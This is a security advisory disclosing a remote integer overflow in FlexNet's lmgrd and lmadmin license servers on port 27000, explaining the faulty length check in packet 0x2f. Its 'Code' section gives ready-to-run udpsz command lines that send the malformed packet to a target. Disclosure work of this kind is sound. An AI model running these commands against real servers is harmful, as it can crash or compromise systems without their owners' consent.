####################################################################### Luigi Auriemma Application: FlexNet License Server Manager http://www.flexerasoftware.com/products/flexnet-publisher.htm http://www.globes.com Versions: <= 11.9 and others earlier (this version number was written when I found the advisory many months/years ago) Platforms: AIX, HP-UX, Linux, Mac OSX, Windows, SGI, Solaris Bug: integer overflow in lmgrd and lmadmin Exploitation: remote, versus server Date: found 25 Oct 2010 fixed 17 Aug 2011 advisory 13 May 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== "FlexNet Publisher software licensing makes it easy for software vendors and high-tech manufacturers to manage, secure, enhance, and grow market share through flexible pricing, packaging, licensing, and protection of their software and SaaS offerings." ####################################################################### ====== 2) Bug ====== lmadmin and lmgrd are two license server managers listening on port 27000 and usually running as system services in the products of various vendors like IBM, HP, Sybase, Citrix, VMWare, SolidWorks and so on. The only difference between the two servers is that lmadmin includes a web interface from which it can be configured and managed. For the handling of the packet 0x2f the server receives 20 bytes that compose the header of this type and then it takes the 16bit number at offset 4 which specifies the size of the whole data (header included) and substracts the 20 bytes just read. No checks are performed on the resulted value and so it's passed directly to recv() for the reading of the rest of the data from the socket appending it to the previous data located in the heap: len = *(u16 *)(buff + 4) - 20; // from -1 to -20 recv(sd, buff + 20, len, 0); The Windows platform is not affected by the vulnerability because the recv() function of Winsock doesn't work with negative lengths. The complexity of lmadmin caused by the inclusion of a complete web server (components of Apache) supporting POST may help in the exploiting of this vulnerability giving the attacker more possibilities of controlling the code flow. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip udpsz -D -T -C "2f 2f 0000 0000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 8000 or udpsz -l 1 -D -T -C "2f 2f 0000 0000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 1030 little note: the byte at offset 1 is a simple checksum of the 20 byte header. ####################################################################### ====== 4) Fix ====== It's unclear if the bug has been fixed or not. #######################################################################